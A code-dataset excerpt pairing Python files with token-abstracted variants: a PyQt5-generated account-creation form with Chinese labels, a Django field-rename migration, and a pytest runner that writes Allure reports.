self.userlineEdit.setText("")
self.userlineEdit.setObjectName("userlineEdit")
self.horizontalLayout.addWidget(self.userlineEdit)
self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.AlignHCenter)
self.widget_4 = QtWidgets.QWidget(self.widget_2)
self.widget_4.setObjectName("widget_4")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.passwordlabel = QtWidgets.QLabel(self.widget_4)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.passwordlabel.setFont(font)
self.passwordlabel.setObjectName("passwordlabel")
self.horizontalLayout_2.addWidget(self.passwordlabel)
self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)
self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.passwordlineEdit.setFont(font)
self.passwordlineEdit.setStyleSheet("border-radius:15px;")
self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)
self.passwordlineEdit.setObjectName("passwordlineEdit")
self.horizontalLayout_2.addWidget(self.passwordlineEdit)
self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.AlignHCenter)
self.widget = QtWidgets.QWidget(self.widget_2)
self.widget.setObjectName("widget")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setFamily("微軟正黑體")
font.setPointSize(28)
self.confirmpasswordlabel.setFont(font)
self.confirmpasswordlabel.setObjectName("confirmpasswordlabel")
self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)
self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)
self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))
font = QtGui.QFont()
font.setPointSize(16)
self.confirmpasswordlineEdit.setFont(font)
self.confirmpasswordlineEdit.setStyleSheet("border-radius:15px;")
self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)
self.confirmpasswordlineEdit.setObjectName("confirmpasswordlineEdit")
self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)
self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)
self.verticalLayout.addWidget(self.widget_2)
self.widget_5 = QtWidgets.QWidget(self.centralwidget)
self.widget_5.setStyleSheet("color:rgb(255, 255, 255)")
self.widget_5.setObjectName("widget_5")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)
self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.confirmpushButton.setFont(font)
self.confirmpushButton.setStyleSheet("border-color: rgb(255, 255, 255);\n"
"background-color: rgb(255, 255, 255,100);\n"
"border-radius:15px;\n"
"font: 20pt;")
self.confirmpushButton.setObjectName("confirmpushButton")
self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.Qt.AlignRight)
self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)
self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.cancelpushButton.setFont(font)
self.cancelpushButton.setStyleSheet("border-color: rgb(255, 255, 255);\n"
"background-color: rgb(255, 255, 255,100);\n"
"border-radius:15px;\n"
"font: 20pt;")
self.cancelpushButton.setObjectName("cancelpushButton")
self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addWidget(self.widget_5)
createaccount.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(createaccount)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
createaccount.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(createaccount)
self.statusbar.setObjectName("statusbar")
createaccount.setStatusBar(self.statusbar)
self.retranslateUi(createaccount)
QtCore.QMetaObject.connectSlotsByName(createaccount)
def retranslateUi(self, createaccount):
_translate = QtCore.QCoreApplication.translate
createaccount.setWindowTitle(_translate("createaccount", "MainWindow"))
self.userlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>"))
self.passwordlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>"))
self.confirmpasswordlabel.setText(_translate("createaccount", "<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>"))
self.confirmpushButton.setText(_translate("createaccount", "確認"))
self.cancelpushButton.setText(_translate("createaccount", "取消"))
| [
"# -*- coding: utf-8 -*-\r\n\r\n# Form implementation generated from reading ui file 'createaccount.ui'\r\n#\r\n# Created by: PyQt5 UI code generator 5.14.1\r\n#\r\n# WARNING! All changes made in this file will be lost!\r\n\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_createaccount(object):\r\n def setupUi(self, createaccount):\r\n createaccount.setObjectName(\"createaccount\")\r\n createaccount.resize(800, 600)\r\n self.centralwidget = QtWidgets.QWidget(createaccount)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget_2.setStyleSheet(\"\")\r\n self.widget_2.setObjectName(\"widget_2\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\r\n self.widget_3.setObjectName(\"widget_3\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.userlabel = QtWidgets.QLabel(self.widget_3)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.userlabel.setFont(font)\r\n self.userlabel.setObjectName(\"userlabel\")\r\n self.horizontalLayout.addWidget(self.userlabel)\r\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\r\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.userlineEdit.setFont(font)\r\n self.userlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.userlineEdit.setText(\"\")\r\n self.userlineEdit.setObjectName(\"userlineEdit\")\r\n self.horizontalLayout.addWidget(self.userlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.AlignHCenter)\r\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\r\n self.widget_4.setObjectName(\"widget_4\")\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.passwordlabel.setFont(font)\r\n self.passwordlabel.setObjectName(\"passwordlabel\")\r\n self.horizontalLayout_2.addWidget(self.passwordlabel)\r\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\r\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.passwordlineEdit.setFont(font)\r\n self.passwordlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.passwordlineEdit.setObjectName(\"passwordlineEdit\")\r\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.AlignHCenter)\r\n self.widget = QtWidgets.QWidget(self.widget_2)\r\n self.widget.setObjectName(\"widget\")\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\r\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\r\n font = QtGui.QFont()\r\n font.setFamily(\"微軟正黑體\")\r\n font.setPointSize(28)\r\n self.confirmpasswordlabel.setFont(font)\r\n self.confirmpasswordlabel.setObjectName(\"confirmpasswordlabel\")\r\n self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\r\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\r\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.confirmpasswordlineEdit.setFont(font)\r\n self.confirmpasswordlineEdit.setStyleSheet(\"border-radius:15px;\")\r\n self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.confirmpasswordlineEdit.setObjectName(\"confirmpasswordlineEdit\")\r\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\r\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\r\n self.verticalLayout.addWidget(self.widget_2)\r\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\r\n self.widget_5.setStyleSheet(\"color:rgb(255, 255, 255)\")\r\n self.widget_5.setObjectName(\"widget_5\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\r\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.confirmpushButton.setFont(font)\r\n self.confirmpushButton.setStyleSheet(\"border-color: rgb(255, 255, 255);\\n\"\r\n\"background-color: rgb(255, 255, 255,100);\\n\"\r\n\"border-radius:15px;\\n\"\r\n\"font: 20pt;\")\r\n self.confirmpushButton.setObjectName(\"confirmpushButton\")\r\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.Qt.AlignRight)\r\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\r\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(False)\r\n font.setItalic(False)\r\n font.setWeight(50)\r\n self.cancelpushButton.setFont(font)\r\n self.cancelpushButton.setStyleSheet(\"border-color: rgb(255, 255, 255);\\n\"\r\n\"background-color: rgb(255, 255, 255,100);\\n\"\r\n\"border-radius:15px;\\n\"\r\n\"font: 20pt;\")\r\n self.cancelpushButton.setObjectName(\"cancelpushButton\")\r\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt.AlignRight)\r\n self.verticalLayout.addWidget(self.widget_5)\r\n createaccount.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(createaccount)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n createaccount.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(createaccount)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n createaccount.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(createaccount)\r\n QtCore.QMetaObject.connectSlotsByName(createaccount)\r\n\r\n def retranslateUi(self, createaccount):\r\n _translate = QtCore.QCoreApplication.translate\r\n createaccount.setWindowTitle(_translate(\"createaccount\", \"MainWindow\"))\r\n self.userlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">帳號:</span></p></body></html>\"))\r\n self.passwordlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">密碼:</span></p></body></html>\"))\r\n self.confirmpasswordlabel.setText(_translate(\"createaccount\", \"<html><head/><body><p><span style=\\\" color:#ffffff;\\\">確認密碼:</span></p></body></html>\"))\r\n self.confirmpushButton.setText(_translate(\"createaccount\", \"確認\"))\r\n self.cancelpushButton.setText(_translate(\"createaccount\", \"取消\"))\r\n",
"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_createaccount(object):\n\n def setupUi(self, createaccount):\n createaccount.setObjectName('createaccount')\n createaccount.resize(800, 600)\n self.centralwidget = QtWidgets.QWidget(createaccount)\n self.centralwidget.setObjectName('centralwidget')\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName('verticalLayout')\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\n self.widget_2.setStyleSheet('')\n self.widget_2.setObjectName('widget_2')\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\n self.verticalLayout_2.setObjectName('verticalLayout_2')\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\n self.widget_3.setObjectName('widget_3')\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\n self.horizontalLayout.setObjectName('horizontalLayout')\n self.userlabel = QtWidgets.QLabel(self.widget_3)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.userlabel.setFont(font)\n self.userlabel.setObjectName('userlabel')\n self.horizontalLayout.addWidget(self.userlabel)\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.userlineEdit.setFont(font)\n self.userlineEdit.setStyleSheet('border-radius:15px;')\n self.userlineEdit.setText('')\n self.userlineEdit.setObjectName('userlineEdit')\n self.horizontalLayout.addWidget(self.userlineEdit)\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.\n AlignHCenter)\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\n self.widget_4.setObjectName('widget_4')\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\n self.horizontalLayout_2.setObjectName('horizontalLayout_2')\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.passwordlabel.setFont(font)\n self.passwordlabel.setObjectName('passwordlabel')\n self.horizontalLayout_2.addWidget(self.passwordlabel)\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.passwordlineEdit.setFont(font)\n self.passwordlineEdit.setStyleSheet('border-radius:15px;')\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.passwordlineEdit.setObjectName('passwordlineEdit')\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.\n AlignHCenter)\n self.widget = QtWidgets.QWidget(self.widget_2)\n self.widget.setObjectName('widget')\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\n self.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.confirmpasswordlabel.setFont(font)\n self.confirmpasswordlabel.setObjectName('confirmpasswordlabel')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.confirmpasswordlineEdit.setFont(font)\n self.confirmpasswordlineEdit.setStyleSheet('border-radius:15px;')\n self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.confirmpasswordlineEdit.setObjectName('confirmpasswordlineEdit')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\n self.verticalLayout.addWidget(self.widget_2)\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\n self.widget_5.setStyleSheet('color:rgb(255, 255, 255)')\n self.widget_5.setObjectName('widget_5')\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\n self.verticalLayout_3.setObjectName('verticalLayout_3')\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.confirmpushButton.setFont(font)\n self.confirmpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.confirmpushButton.setObjectName('confirmpushButton')\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.\n Qt.AlignRight)\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.cancelpushButton.setFont(font)\n self.cancelpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.cancelpushButton.setObjectName('cancelpushButton')\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt\n .AlignRight)\n self.verticalLayout.addWidget(self.widget_5)\n createaccount.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(createaccount)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\n self.menubar.setObjectName('menubar')\n createaccount.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(createaccount)\n self.statusbar.setObjectName('statusbar')\n createaccount.setStatusBar(self.statusbar)\n self.retranslateUi(createaccount)\n QtCore.QMetaObject.connectSlotsByName(createaccount)\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n\n def setupUi(self, createaccount):\n createaccount.setObjectName('createaccount')\n createaccount.resize(800, 600)\n self.centralwidget = QtWidgets.QWidget(createaccount)\n self.centralwidget.setObjectName('centralwidget')\n self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)\n self.verticalLayout.setObjectName('verticalLayout')\n self.widget_2 = QtWidgets.QWidget(self.centralwidget)\n self.widget_2.setStyleSheet('')\n self.widget_2.setObjectName('widget_2')\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.widget_2)\n self.verticalLayout_2.setObjectName('verticalLayout_2')\n self.widget_3 = QtWidgets.QWidget(self.widget_2)\n self.widget_3.setObjectName('widget_3')\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget_3)\n self.horizontalLayout.setObjectName('horizontalLayout')\n self.userlabel = QtWidgets.QLabel(self.widget_3)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.userlabel.setFont(font)\n self.userlabel.setObjectName('userlabel')\n self.horizontalLayout.addWidget(self.userlabel)\n self.userlineEdit = QtWidgets.QLineEdit(self.widget_3)\n self.userlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.userlineEdit.setFont(font)\n self.userlineEdit.setStyleSheet('border-radius:15px;')\n self.userlineEdit.setText('')\n self.userlineEdit.setObjectName('userlineEdit')\n self.horizontalLayout.addWidget(self.userlineEdit)\n self.verticalLayout_2.addWidget(self.widget_3, 0, QtCore.Qt.\n AlignHCenter)\n self.widget_4 = QtWidgets.QWidget(self.widget_2)\n self.widget_4.setObjectName('widget_4')\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.widget_4)\n self.horizontalLayout_2.setObjectName('horizontalLayout_2')\n self.passwordlabel = QtWidgets.QLabel(self.widget_4)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.passwordlabel.setFont(font)\n self.passwordlabel.setObjectName('passwordlabel')\n self.horizontalLayout_2.addWidget(self.passwordlabel)\n self.passwordlineEdit = QtWidgets.QLineEdit(self.widget_4)\n self.passwordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.passwordlineEdit.setFont(font)\n self.passwordlineEdit.setStyleSheet('border-radius:15px;')\n self.passwordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.passwordlineEdit.setObjectName('passwordlineEdit')\n self.horizontalLayout_2.addWidget(self.passwordlineEdit)\n self.verticalLayout_2.addWidget(self.widget_4, 0, QtCore.Qt.\n AlignHCenter)\n self.widget = QtWidgets.QWidget(self.widget_2)\n self.widget.setObjectName('widget')\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.widget)\n self.horizontalLayout_3.setContentsMargins(-1, -1, 82, -1)\n self.horizontalLayout_3.setObjectName('horizontalLayout_3')\n self.confirmpasswordlabel = QtWidgets.QLabel(self.widget)\n font = QtGui.QFont()\n font.setFamily('微軟正黑體')\n font.setPointSize(28)\n self.confirmpasswordlabel.setFont(font)\n self.confirmpasswordlabel.setObjectName('confirmpasswordlabel')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlabel)\n self.confirmpasswordlineEdit = QtWidgets.QLineEdit(self.widget)\n self.confirmpasswordlineEdit.setMinimumSize(QtCore.QSize(300, 30))\n font = QtGui.QFont()\n font.setPointSize(16)\n self.confirmpasswordlineEdit.setFont(font)\n self.confirmpasswordlineEdit.setStyleSheet('border-radius:15px;')\n self.confirmpasswordlineEdit.setEchoMode(QtWidgets.QLineEdit.Password)\n self.confirmpasswordlineEdit.setObjectName('confirmpasswordlineEdit')\n self.horizontalLayout_3.addWidget(self.confirmpasswordlineEdit)\n self.verticalLayout_2.addWidget(self.widget, 0, QtCore.Qt.AlignHCenter)\n self.verticalLayout.addWidget(self.widget_2)\n self.widget_5 = QtWidgets.QWidget(self.centralwidget)\n self.widget_5.setStyleSheet('color:rgb(255, 255, 255)')\n self.widget_5.setObjectName('widget_5')\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.widget_5)\n self.verticalLayout_3.setObjectName('verticalLayout_3')\n self.confirmpushButton = QtWidgets.QPushButton(self.widget_5)\n self.confirmpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.confirmpushButton.setFont(font)\n self.confirmpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.confirmpushButton.setObjectName('confirmpushButton')\n self.verticalLayout_3.addWidget(self.confirmpushButton, 0, QtCore.\n Qt.AlignRight)\n self.cancelpushButton = QtWidgets.QPushButton(self.widget_5)\n self.cancelpushButton.setMinimumSize(QtCore.QSize(200, 60))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.cancelpushButton.setFont(font)\n self.cancelpushButton.setStyleSheet(\n \"\"\"border-color: rgb(255, 255, 255);\nbackground-color: rgb(255, 255, 255,100);\nborder-radius:15px;\nfont: 20pt;\"\"\"\n )\n self.cancelpushButton.setObjectName('cancelpushButton')\n self.verticalLayout_3.addWidget(self.cancelpushButton, 0, QtCore.Qt\n .AlignRight)\n self.verticalLayout.addWidget(self.widget_5)\n createaccount.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(createaccount)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\n self.menubar.setObjectName('menubar')\n createaccount.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(createaccount)\n self.statusbar.setObjectName('statusbar')\n createaccount.setStatusBar(self.statusbar)\n self.retranslateUi(createaccount)\n QtCore.QMetaObject.connectSlotsByName(createaccount)\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n <function token>\n\n def retranslateUi(self, createaccount):\n _translate = QtCore.QCoreApplication.translate\n createaccount.setWindowTitle(_translate('createaccount', 'MainWindow'))\n self.userlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">帳號:</span></p></body></html>'\n ))\n self.passwordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">密碼:</span></p></body></html>'\n ))\n self.confirmpasswordlabel.setText(_translate('createaccount',\n '<html><head/><body><p><span style=\" color:#ffffff;\">確認密碼:</span></p></body></html>'\n ))\n self.confirmpushButton.setText(_translate('createaccount', '確認'))\n self.cancelpushButton.setText(_translate('createaccount', '取消'))\n",
"<import token>\n\n\nclass Ui_createaccount(object):\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,839 | f522aa91a06970bc4361d8ad01f8c33852d948ce | # Generated by Django 2.0.5 on 2020-01-21 08:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('doctor', '0344_searchscoreparams'),
]
operations = [
migrations.RenameField(
model_name='searchscoreparams',
old_name='value',
new_name='max_score',
),
]
| [
"# Generated by Django 2.0.5 on 2020-01-21 08:23\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('doctor', '0344_searchscoreparams'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='searchscoreparams',\n old_name='value',\n new_name='max_score',\n ),\n ]\n",
"from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0344_searchscoreparams')]\n operations = [migrations.RenameField(model_name='searchscoreparams',\n old_name='value', new_name='max_score')]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0344_searchscoreparams')]\n operations = [migrations.RenameField(model_name='searchscoreparams',\n old_name='value', new_name='max_score')]\n",
"<import token>\n\n\nclass Migration(migrations.Migration):\n <assignment token>\n <assignment token>\n",
"<import token>\n<class token>\n"
] | false |
99,840 | 029ea533bd746c0933d4b0a594ec538e1b965de0 | import pytest
import os
import sys
from ks_login import load_log
log = load_log.Log()
class TbpRunner(object):
def run(self, path=None, run_args=None, case_mark=None):
if path:
work_runner = []
path_list = path.split(",")
work_runner.append("-s")
if case_mark:
work_runner.append("-m=%s" % case_mark)
for i in path_list:
work_runner.append(i)
work_runner.append("--alluredir")
work_runner.append("report")
print(work_runner)
pytest.main(work_runner)
else:
pytest.main(["-s",
"pytest_test/options",
"--alluredir", "report"])
if __name__ == "__main__":
try:
work_path = sys.argv[1]
except Exception as e:
log.error(e.args)
work_path = None
print(work_path)
run = TbpRunner()
run.run(path=work_path)
# pytest.main(["--clean-alluredir", "-s", "pytest_test/options/test_file.py", "--alluredir", 'report'])
| [
"import pytest\nimport os\nimport sys\nfrom ks_login import load_log\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(\",\")\n work_runner.append(\"-s\")\n if case_mark:\n work_runner.append(\"-m=%s\" % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append(\"--alluredir\")\n work_runner.append(\"report\")\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main([\"-s\",\n \"pytest_test/options\",\n \"--alluredir\", \"report\"])\n\n\n\n\n\nif __name__ == \"__main__\":\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n\n print(work_path)\n\n run = TbpRunner()\n run.run(path=work_path)\n\n\n # pytest.main([\"--clean-alluredir\", \"-s\", \"pytest_test/options/test_file.py\", \"--alluredir\", 'report'])\n\n",
